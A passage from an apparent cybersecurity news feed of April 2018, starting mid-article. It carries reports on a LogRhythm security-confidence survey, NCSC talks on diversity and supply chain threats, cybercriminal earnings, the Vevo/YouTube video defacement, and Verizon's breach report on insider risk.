The study surveyed 751 IT decision makers from the US, UK and Asia-Pacific and found that there are many factors that enable a security team to quickly detect and respond to an incident, including technology, process, programs and people.

When it comes to technology, a strong majority (nearly 80%) of IT executives said that a platform for security management, analysis and response is beneficial, though only about a third rate such a platform as “very” beneficial. This response may reinforce the notion that true security confidence cannot be created with technology alone.

When asked to consider how their organization is operating from a threat lifecycle management (TLM) perspective – as an approach that includes discovery, qualification, neutralization and recovery from cyber-attacks – IT executives were not overly optimistic. About a third of all respondents reported that they need help at virtually all stages in the TLM workflow, especially detecting, investigating, neutralizing and recovering from cyber-threats.

“Cyber-threats continue to grow in volume and intensity. Seemingly every month, another massive security breach dominates the headlines,” said Matt Winter, VP of marketing and business development at LogRhythm. “To combat these threats, organizations need to carefully plan their budgets and strategies while developing effective programs that tackle specific threats and keep them one step ahead of cyber-attackers.”

The survey also uncovered that many companies are focused on growing their security maturity, and team size is an important indicator. On average, companies employ 12 cybersecurity professionals in their organization. However, more than half of the respondents said that they employ 10 or fewer.

Special threat detection programs are another indicator of security maturity. This study found that most decision-makers – more than 70% of respondents – have programs in place to detect specific threats, such as ransomware, insider or employee threats, and denial of service (DoS) attacks. The vast majority of IT decision makers (95%) also use security software to prevent and react to threats. And more than a quarter deploy at least 10 security software solutions to manage security threats.

As a result of all of this, a majority of organizations are only moderately confident in their ability to protect their companies against hackers. When it comes to confidence levels, about half of security decision makers believe that a determined hacker can still breach their organization. In fact, over one-third reported that their company has experienced a breach in the past year – ranging from 29% in the United States to 39% in the Asia-Pacific region.

When specifically asked about level of confidence, these decision makers revealed that they have only moderately positive confidence in their cybersecurity measures and abilities, suggesting an attitude that is more hopeful than truly confident.

Similarly, most IT executives (over 60%) are only somewhat confident that their security software can detect all major breaches. Likewise, they are only moderately confident that they can protect their companies from hackers.

In addition, the level of confidence in one’s security is also swayed by other variables, such as the implementation of programs that target specific types of threats. For instance, decision makers who did not report having programs to protect against threats such as ransomware, insider threats and service-denial attacks are less confident in their security programs. Unsurprisingly, that same segment reported slower rates of detection, response and containment.

Categories: Cyber Risk News

#CyberUK NCSC Say Diversity Will Aid a Safer Britain

Tue, 04/10/2018 - 15:08

In order for Britain to be safer, cybersecurity needs to be more agile and diverse.

Speaking at the CyberUK conference in Manchester, NCSC director of communications Nicola Hudson said that to build a safer digital Britain, “a cyber industry that is innovative, diverse and agile needs to be built.”

Focusing on the issue of diversity in the industry, Hudson said that people from a range of disciplines and backgrounds should be brought together to work on solving the issue.

“We are delighted to welcome people from all the professions that must come together to deliver effective security, not just those who might directly think of themselves as primarily security people,” she said.

“We also need to bring the widest pool of talent that we possibly can and that means we need a much more diverse workforce. As a public service organization, we need to reflect the population that we’re serving. A more diverse workforce is essential to this. It makes us more effective.”

Acknowledging that there is “no magic switch to improve on the lack of diversity in this sector,” Hudson welcomed steps by the NCSC as an organization which is “determined to look at diversity in its widest sense”. This was not just about the lack of women, but socio-economic factors, regional and cultural differences, disability, BAME and the LGBT community.

Hudson said: “We celebrate the diversity of thinking which has made the NCSC and GCHQ world-leaders. Without true diversity we are in danger of group-think, behavior challenges and quite frankly we will not tap into the skills we need. We are looking at immediate things we can do, medium term plans and generational change. All have their own challenges.”

Plans by the NCSC include looking at recruitment plans, and retaining the diverse pool of talent it requires. The CyberUK conference also features a “pledge wall” as a commitment by delegates to make an effort to increase the diversity of their workforce.

Speaking to Infosecurity, Hudson said that to be the best at cybersecurity, the most diverse group of people are needed who will approach scenarios differently. “For me, diversity is at the heart of everything we are trying to do,” she said.

“This is not about the right thing to do, survey after survey and business after business proves that having a diverse workforce works. It is not just a ‘nice to have’, it is critical for success. As I said earlier, this is hard and we cannot do it ourselves – this is a community and if we work on it together, we will all benefit.”

Categories: Cyber Risk News

Cyber-Criminals Could Earn CEO-Level Salary: Report

Tue, 04/10/2018 - 13:01

High-earning cyber-criminals make as much as $2m per year, almost as much as the average FTSE CEO, a new study from Bromium has claimed.

The security vendor commissioned Mike McGuire, senior lecturer in criminology at Surrey University, to produce the report, which is based on first-hand interviews with convicted cyber-criminals, and data from international law enforcers, financial institutions and the Dark Web.

The study, Into the Web of Profit, claimed that even “mid-level” hackers could earn as much as $900,000 annually – more than double the US presidential salary.

Those at the “entry-level” of their black hat trade can expect to make over $40,000, more than a UK university graduate.

The research highlights one of the problems facing the IT industry in recruiting those with the right skills – that there will be a significant minority potentially prepared to seek employment on the other side of the law.

The issue is especially acute in the public sector and across UK law enforcement, where austerity cuts mean forces can’t offer competitive salaries.

The starting salary for a National Crime Agency (NCA) trainee officer is just £23,000-£25,000, according to estimates.

There have even been plans mooted in the UK to draft in volunteers to help with policing cybercrime.

“Cybercrime is a lucrative business, with relatively low risks compared to other forms of crime. Cyber-criminals are rarely caught and convicted because they are virtually invisible. As criminals further monetize their business allowing anyone to buy pre-packaged malware or hire hackers on demand, the ability to catch the king-pins becomes even more challenging,” said Bromium CEO Gregory Webb.

“The cybersecurity industry, business and law enforcement agencies need to come together to disrupt hackers and cut off their revenue streams. By focusing on new methods of cybersecurity that protect rather than detect, we believe we can make cybercrime a lot harder.”

The report also detailed what cyber-criminals like to spend their ill-gotten gains on. Many (30%) look to invest in property, art or legitimate financial instruments, while others (20%) plough that money back into IT equipment.

However, a sizeable number (20%) also spend their money on drugs, prostitutes and the like, according to the report.

Categories: Cyber Risk News

Vevo YouTube Channels Suffer Music Video Hack

Tue, 04/10/2018 - 12:11

Popular streaming service YouTube has confirmed hacking activity on a number of Vevo channels on its platform, affecting high-profile music videos.

A YouTube statement read: “After seeing unusual upload activity on a handful of Vevo channels, we worked quickly with our partner to disable access while they investigate the issue.” YouTube made clear that the issue has impacted Vevo specifically and not YouTube more broadly.

As detailed by the BBC, the videos for several hit songs, including ‘Despacito’, were defaced – the Despacito video has since been removed but the cover image featured a group wearing masks and pointing guns.

“The hackers, calling themselves Prosox and Kuroi'sh, had written ‘Free Palestine’ underneath the videos,” stated the BBC.

A statement from Vevo added: “Vevo can confirm that a number of videos in its catalog were subject to a security breach today, which has now been contained. We are working to reinstate all videos affected and our catalog to be restored to full working order. We are continuing to investigate the source of the breach.”

Mark James, security specialist at ESET, said the details currently surrounding the hack are sparse, so trying to figure out who was responsible or how they did it is not something that’s easily done.

“The problem with these types of hacks is the potential for damage caused,” he added.

However, Lee Munson, security researcher at Comparitech, was quick to point out the incident looks to be relatively benign in nature, featuring a fairly tame political message and motivated by the ‘fun’ of the challenge.

“In that respect then, it is in itself, nothing much to worry about for the video hosting site, though it does suggest that the defacement of videos is not technically difficult to achieve, given the number of high profile artists that have been targeted.

“What exactly YouTube is doing to prevent content like this appearing via Vevo is unclear but it will be interesting to see whether other hacktivists jump on the bandwagon and use such sites to make their points in the future.”

Categories: Cyber Risk News

YouTube Suffers Music Video Hack

Tue, 04/10/2018 - 12:11

Popular streaming service YouTube has suffered a hack of a number of its high-profile music videos, according to reports.

As detailed by the BBC, the videos for several hit songs, including ‘Despacito’, have been defaced – the Despacito video has since been removed but the cover image featured a group wearing masks and pointing guns, whilst other videos are supposed to still be live.

“The hackers, calling themselves Prosox and Kuroi'sh, had written ‘Free Palestine’ underneath the videos,” stated the BBC.

Mark James, security specialist at ESET, said the details currently surrounding the hack are sparse, so trying to figure out who was responsible or how they did it is not something that’s easily done.

“The problem with these types of hacks is the potential for damage caused. For YouTube it’s a brand and PR issue. For the artists it’s the personal damage of their brand being used for nefarious purposes,” he added.

However, Lee Munson, security researcher at Comparitech, was quick to point out the incident looks to be relatively benign in nature, featuring a fairly tame political message and motivated by the ‘fun’ of the challenge.

“In that respect then, it is in itself, nothing much to worry about for the video hosting site, though it does suggest that the defacement of videos is not technically difficult to achieve, given the number of high profile artists that have been targeted.

“What exactly YouTube is doing to prevent content like this appearing via Vevo is unclear but it will be interesting to see whether other hacktivists jump on the bandwagon and use such sites to make their points in the future.”

Categories: Cyber Risk News

#CyberUK18: Bank of England Calls for More Cyber Translators

Tue, 04/10/2018 - 11:02

Communication from the cybersecurity department to the board should consider their expertise and context – and not use jargon.

Speaking at the NCSC CyberUK Conference in Manchester, Joanna Place, deputy governor and chief operating officer at the Bank of England, said that “security is no different from other areas of expertise in terms of talking to the board.” This involves how much is being spent, what the risks are, if the actions are proportionate, whether there are the right skills and what the context of the issue is.

Place said that the role of the cyber expert is two-fold: to understand the threats and mitigate against them, and also to communicate that in a language that is understandable. “Your job as cyber experts is to tell the board what they need to know, not just answer the questions that they have,” Place added.

“You also need to be understood by each member of your business. If all of the knowledge and expertise resides with the cyber experts only, your business will be very vulnerable, so you need to be a cyber expert and a cyber translator.”

Place said that the board may not be cyber experts, but want assurance of what is being done for cyber-risks. “If they cannot understand what you are saying, they may think that you cannot communicate very well, but they may think that you don’t understand your subject and that will give them cause for concern.”

She also advised speaking the language of risk that the board will understand, using examples that make sense and “making sure they know what they need to know.”

Place also encouraged consideration of how boards receive information, and delivering that in a suitable format. She said that the Bank of England has “cyber translators” and she called on cyber experts to be cyber translators so that “everyone in the business can understand the security risks.”

In conclusion, Place told cyber experts to “take the board on the cybersecurity journey with you,” and give them assurance that you can articulate your knowledge.

“Know your subject, understand the business context and know the audience to whom you are speaking. Get the board and every employee to understand information security and their role in it. By sharing your knowledge you are going to reduce the risk your business faces and you’re going to become a much more effective cyber expert.”

Categories: Cyber Risk News

NCSC: UK Firms Face Rising Supply Chain Cyber-Threat

Tue, 04/10/2018 - 10:42

UK organizations are facing an unprecedented threat from cyberspace, according to the National Cyber Security Centre (NCSC).

The GCHQ body warned in a new report produced with the National Crime Agency (NCA) that UK businesses faced more attacks than ever before in 2017, with ransomware, supply chain attacks, data breaches and fake news all making a significant impact.

Between October 2016 when the NCSC was opened and the end of 2017, it recorded 34 “significant” cyber-attacks like WannaCry which required a cross-government response, and 762 less serious incidents.

The supply chain was highlighted as a particular area of risk – even for organizations with mature cybersecurity strategies.

“Supply chain compromises of managed service providers and legitimate software (such as MeDoc and CCleaner) provided cyber-adversaries with a potential stepping stone into the networks of thousands of clients, capitalizing on the gateways provided by privileged accesses and client/supplier relationships,” the report noted.

“It is clear that even if an organization has excellent cybersecurity, there can be no guarantee that the same standards are applied by contractors and third-party suppliers in the supply chain. Attackers will target the most vulnerable part of a supply chain to reach their intended victim.”

Supply chain attacks are extremely difficult to detect, even with the right network monitoring tools, as it can be hard to tell whether a discovered flaw has been introduced accidentally by the manufacturer or deliberately by attackers.

The NCSC recommended that organizations follow the “least privilege” principle when granting third parties remote access, and work with Cyber Essentials certified organizations, or those that can demonstrate they follow the NCSC’s 10 Steps to Cybersecurity guidance.

Webroot director of threat research, David Kennerley, said the report's findings were no surprise.

“Organizations need to utilize a multi-layered approach with real-time threat intelligence to detect all types of emerging threats and stop attacks before they strike, while not forgetting the essential role of employee education within any organization,” he added.

“Employees are often seen as the weakest link with regards to security. It’s time to buck this trend, and instead utilize them as the first line of defense.”

Matt Walmsley, EMEA director at Vectra, added that firms need to adopt an “I’m already compromised” mentality.

“We need to… put in place security capabilities that not only block known threats but that are smart enough to detect and respond in real-time to active threats that have defeated or bypassed defensive controls and gained access and persistence within the organization,” he continued.

“Finally, we need the executive leadership and governance bodies of organizations to step up and recognize that security is a strategic organizational issue, not one simply of technology.”

The report comes just days after an NCSC warning that Russian state hackers are again targeting CNI supply chain organizations in the engineering and industrial control spheres.

Categories: Cyber Risk News

Insiders Blamed for Over a Quarter of Breaches

Tue, 04/10/2018 - 09:32

Employees emerged yet again as a major cyber-risk to organizations last year, accounting for 28% of breaches with human error a major factor contributing to data loss, according to Verizon.

The firm’s annual Data Breach Investigations Report for 2018 analyzed 2,216 confirmed data breaches around the world and over 53,000 incidents from the previous year.

Although ransomware was pegged as the biggest malicious software threat, found in 39% of malware-related cases, the human element was highlighted as a major source of weakness in organizations.

In fact, user error was a factor in 17% of breaches, just behind the top pattern of web application attacks. In this case, “error” includes misconfigurations, of the sort seen often over the past year affecting firms with Amazon cloud installations, as well as publishing errors. However, “mis-delivery” was the biggest factor here.

Mis-delivery is easy to do when using email to send sensitive data, especially with auto-fill, according to Verizon principal Laurence Dine.

“That can best be prevented through regular training to remind employees of the sensitivities of the data they’re handling and of the need to pay close attention to who they’re sending emails to. For the occasions when mistakes do still happen, encryption can help to prevent files being opened by anyone other than the correct recipient,” he told Infosecurity.

Phishing is another key means by which employees are exposing their organization to the risk of breaches. Financial pretexting and phishing represent 93% of all breaches investigated in the report, with email the main entry point, and 4% of targets in any given phishing campaign will click through, according to Verizon.

“The insider human factor continues to be a key weakness across our analysis, given the regularity with which employees are still falling victim to social attacks,” said Dine. “Companies are nearly three times more likely to get breached by social attacks than via actual vulnerabilities, emphasizing the need for ongoing employee cybersecurity education. Ultimately, employees should be a business’s first line of defense, rather than the weakest link in the security chain.”

Healthcare was the industry most affected by breaches (24%), and also the only sector in which insider threats (56%) outweighed those from external attackers (43%).

“Measures to protect against these vulnerabilities include segmenting clients from critical assets and using strong authentication measures, so hackers need more than a keylogger to compromise a user device. If the organization uses email in the cloud, then two-factor authentication is also advisable,” advised Dine.

“Organizations should also train responders along with the end-user base, testing their ability to detect a campaign, identify potential infected hosts, determine device activity post-compromise, and confirm the existence of data exfiltration. It can also help to provide role-specific training to users that are targeted based on their privileges or access to data. It’s particularly important to train employees with access to employee data or the ability to transfer funds to be more sceptical, as they are likely targets within the organization. It isn’t paranoia if someone really is out to get them.”

Overall, external attackers continue to be the number one breach threat by far, accounting for 73%, with half of those cybercrime gangs and 12% state-sponsored actors.

However, over three-quarters (76%) of breaches were financially motivated, which illustrates not only the large numbers of cyber-criminals launching attacks, but also the persistent minority of malicious insiders.

“Deliberate misuse is the other key factor we see with insider threats, where employees are abusing their privileges to access data inappropriately. In these cases, having policies and processes in place to monitor when sensitive data is accessed is imperative to spotting any suspicious activity,” said Dine.

“It’s also advisable to make all employees aware via security training and awareness promotion that if they are known to have viewed any sensitive data without a genuine business need, then there is potential for disciplinary action to be taken.”

Categories: Cyber Risk News